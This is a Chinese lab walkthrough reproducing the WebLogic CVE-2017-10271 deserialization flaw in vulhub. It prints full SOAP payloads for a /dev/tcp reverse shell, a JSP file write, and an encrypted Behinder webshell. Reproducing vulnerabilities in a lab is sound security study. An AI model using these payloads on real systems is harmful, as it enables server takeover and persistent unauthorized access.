CVE-2017-10271 【vulhub 漏洞复现】

admin 2024年10月29日23:03:27评论42 views字数 3161阅读10分32秒阅读模式

CVE-2017-10271  

环境搭建  

这里的环境在contos7上

进入环境

           CVE-2017-10271 【vulhub 漏洞复现】  

启动环境  

docker-compose up -d//启动容器            
docker-compose ps -a//查看启动的容器状态            

CVE-2017-10271 【vulhub 漏洞复现】

CVE-2017-10271 【vulhub 漏洞复现】

浏览访问  

靶机地址+分配的端口

以下报错页面,环境搭建成功

CVE-2017-10271 【vulhub 漏洞复现】

漏洞URL  

/wls-wsat/CoordinatorPortType            
/wls-wsat/RegistrationPortTypeRPC            
/wls-wsat/ParticipantPortType            
/wls-wsat/RegistrationRequesterPortType            
/wls-wsat/CoordinatorPortType11            
/wls-wsat/RegistrationPortTypeRPC11            
/wls-wsat/ParticipantPortType11            
/wls-wsat/RegistrationRequesterPortType11            

复现  

利用漏洞url,拼接访问

http://192.168.10.67:7001/wls-wsat/CoordinatorPortType            

CVE-2017-10271 【vulhub 漏洞复现】

利用poc反弹shell  

poc   

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<java version="1.4.0" class="java.beans.XMLDecoder">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>bash -i &gt;&amp; /dev/tcp/10.0.0.1/21 0&gt;&amp;1</string>

</void>

</array>

<void method="start"/></void>

</java>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body/>

</soapenv:Envelope>

刷新当前页面,抓包发送到repeater  

CVE-2017-10271 【vulhub 漏洞复现】

修改数据包格式  

CVE-2017-10271 【vulhub 漏洞复现】

修改请求包,kali监听,反弹shell  

CVE-2017-10271 【vulhub 漏洞复现】

kali监听命令  

nc -lvnp 21                      

CVE-2017-10271 【vulhub 漏洞复现】

成功

尝试写一个文件上去,看能否解析

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

     <soapenv:Header>

     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

     <java><java version="1.4.0" class="java.beans.XMLDecoder">

     <object class="java.io.PrintWriter">      <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>

     <void method="println"><string>

     <![CDATA[

 <% out.print("test"); %>

     ]]>

     </string>

     </void>

     <void method="close"/>

     </object></java></java>

     </work:WorkContext>

     </soapenv:Header>

     <soapenv:Body/>

</soapenv:Envelope>

CVE-2017-10271 【vulhub 漏洞复现】

访问上传文件  

路劲:/bea_wls_internal/test.jsp

拼接访问:http://192.168.10.67:7001/bea_wls_internal/test.jsp

CVE-2017-10271 【vulhub 漏洞复现】

能解析

上传webshell,(冰蝎自带jsp马)   

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

     <soapenv:Header>

     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

     <java><java version="1.4.0" class="java.beans.XMLDecoder">

     <object class="java.io.PrintWriter">      <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/shell.jsp</string>

     <void method="println"><string>

     <![CDATA[

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

     ]]>

     </string>

     </void>

     <void method="close"/>

     </object></java></java>

     </work:WorkContext>

     </soapenv:Header>

     <soapenv:Body/>

</soapenv:Envelope>

CVE-2017-10271 【vulhub 漏洞复现】

浏览访问shell  

路径:/bea_wls_internal/shell.jsp

CVE-2017-10271 【vulhub 漏洞复现】

冰蝎连接  

CVE-2017-10271 【vulhub 漏洞复现】

CVE-2017-10271 【vulhub 漏洞复现】

大佬文章:  

https://blog.csdn.net/qq_45612828/article/details/126235627

原文始发于微信公众号(小白摸坑学网安):CVE-2017-10271 【vulhub 漏洞复现】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月29日23:03:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2017-10271 【vulhub 漏洞复现】http://cn-sec.com/archives/2493322.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息